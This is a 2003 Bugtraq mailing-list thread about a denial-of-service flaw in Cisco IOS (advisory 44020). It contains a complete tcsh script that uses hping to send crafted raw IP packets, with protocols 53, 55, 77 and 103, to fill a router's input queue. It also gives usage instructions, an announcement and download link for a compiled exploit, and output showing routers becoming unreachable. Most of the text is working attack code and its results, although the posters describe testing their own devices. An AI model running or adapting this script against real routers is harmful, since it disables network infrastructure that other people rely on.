Thanks for the code, Pat. For those with a slightly older hping (rc1), the --ipproto switch can be replaced with -H and the --rand-source flag needs to be removed. The -H and --ipproto switches are the same and I don't think there's any need to have randomization of the source IP address for testing my own devices so rc1 and rc2 should be able to test the devices equally well. -----Original Message----- From: Donahue, Pat [mailto:PDonahue@acmicorp.com] Sent: Monday, July 21, 2003 1:19 PM To: Martin Kluge; bugtraq@securityfocus.com Subject: RE: Cisco IOS exploit (44020) Here's a much simpler shell script that produces the same result: --- BEGIN SHELL SCRIPT --- #!/bin/tcsh -f if ($1 == "" || $2 == "") then echo "usage: $0 <router hostname|address> <ttl>" exit endif foreach protocol (53 55 77 103) /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 19 --interval u250 --data 26 end --- END SHELL SCRIPT --- There's little reason to compile source code that will be run as root if the same thing can be accomplished with a tool that has been used and trusted by systems administrators for quite some time. Hping can be found at http://www.hping.org and "is a command-line oriented TCP/IP packet assembler/analyzer". Before upgrading my routers, I wrote this script to confirm that they were indeed vulnerable. As you can see, the script iterates over the various protocols (SWIPE, IP Mobility, Sun ND, PIM) and sends 19 packets each using hping for a total of 76 (one more than needed to fill up the input queue). What is interesting to note is that the input queue on the interface can be exploited using just one of the vulnerable protocols; try changing the "foreach protocol (53 55 77 103)" line to "foreach protocol (53)" and then changing the "--count 19" parameter to "--count 76". When I first read the security advisory I thought that Cisco had tried to make it seem that all 4 were necessary. You must be able to open raw sockets so either run the script as root or set the suid bit. The syntax is: ./exploit.sh <hostname|address> <ttl> where <hostname|address> is the hostname or IP address of the vulnerable Cisco IOS device and <ttl> is the TTL subtracted by 255. Here is an example: > ping 192.168.1.1 PING 192.168.1.1 (192.168.1.1): 56 data bytes 64 bytes from 192.168.1.1: icmp_seq=0 ttl=255 time=1.063 ms ^C > telnet 192.168.1.1 User Access Verification Password: telnet> close # ./exploit.sh 192.168.1.1 0 HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes --- 192.168.1.1 hping statistic --- 19 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes --- 192.168.1.1 hping statistic --- 19 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes --- 192.168.1.1 hping statistic --- 19 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes --- 192.168.1.1 hping statistic --- 19 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms > telnet 192.168.1.1 Trying 192.168.1.1... telnet: Unable to connect to remote host: No route to host And finally, from the console: Router> show int FastEthernet0/0 | include Input Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0 Regards, Patrick Donahue Network/Systems Administrator ACMI Corporation -----Original Message----- From: Martin Kluge [mailto:martin@elxsi.de] Sent: Monday, July 21, 2003 12:02 PM To: bugtraq@securityfocus.com Subject: Cisco IOS exploit (44020) Hi, I'd like to submit a DoS attack against the recently found bug in almost all Cisco IOS versions (Cisco document ID 44020). The exploit can be found here (and it is included as attachment): http://www.elxsi.de/cisco-bug-44020.tar.gz This exploit is NOT broken (like the shadowchode.tar.gz exploit for example): Example: bash-2.05b# telnet 192.168.1.123 Trying 192.168.1.123... Connected to 192.168.1.123. Escape character is '^]'. User Access Verification Username: 103 Password: ****** 1003>show version IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc1) Copyright (c) 1986-2002 by cisco Systems, Inc. Compiled Mon 01-Apr-02 19:36 by srani Image text-base: 0x02004000, data-base: 0x0259733C ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1) BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE SOFTWARE (fc1) 1003 uptime is 6 minutes System restarted by power-on System image file is "flash:c1000-bnsy56-mz.120-22.bin" cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory. Processor board ID 03305903 Bridging software. X.25 software, Version 3.0.0. Basic Rate ISDN software, Version 1.1. 1 Ethernet/IEEE 802.3 interface(s) 1 ISDN Basic Rate interface(s) 7K bytes of non-volatile configuration memory. bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0 DEBUG: Hops: 1 DEBUG: Protocol: 53 DEBUG: Checksum: 47299 DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b DEBUG: Wrote 20 bytes. DEBUG: Protocol: 55 DEBUG: Checksum: 61909 DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b DEBUG: Wrote 20 bytes. DEBUG: Protocol: 55 DEBUG: Checksum: 55515 DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b DEBUG: Wrote 20 bytes. DEBUG: Protocol: 53 DEBUG: Checksum: 10618 DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b DEBUG: Wrote 20 bytes. DEBUG: Protocol: 77 DEBUG: Checksum: 40137 DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b DEBUG: Wrote 20 bytes. <snip> ... <snip> bash-2.05b# telnet 192.168.1.123 Trying 192.168.1.123... telnet: Unable to connect to remote host: No route to host If I login via term, I can see the following: Press RETURN to get started! 00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up 00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp 00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten 00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten 00:00:39: %SYS-5-CONFIG_I: Configured from memory by console 00:00:39: %SYS-5-RESTART: System restarted -- Cisco Internetwork Operating System Software IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc) Copyright (c) 1986-2002 by cisco Systems, Inc. Compiled Mon 01-Apr-02 19:36 by srani 00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up 1003>en Password: ****** 1003#show Interfaces Ethernet 0 Ethernet0 is up, line protocol is up Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727) Internet address is 192.168.1.123/24 MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255 Encapsulation ARPA, loopback not set, keepalive set (10 sec) ARP type: ARPA, ARP Timeout 04:00:00 Last input 00:02:04, output 00:00:04, output hang never Last clearing of "show interface" counters never Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0 ^^ || The input queue is full :) Cheers, Martin Kluge -- Name : Martin Kluge email : martin@elxsi.info Phone : +49 160 1515182 Projects : http://www.aa-security.de GPG Key : http://www.elxsi.de/key.pub
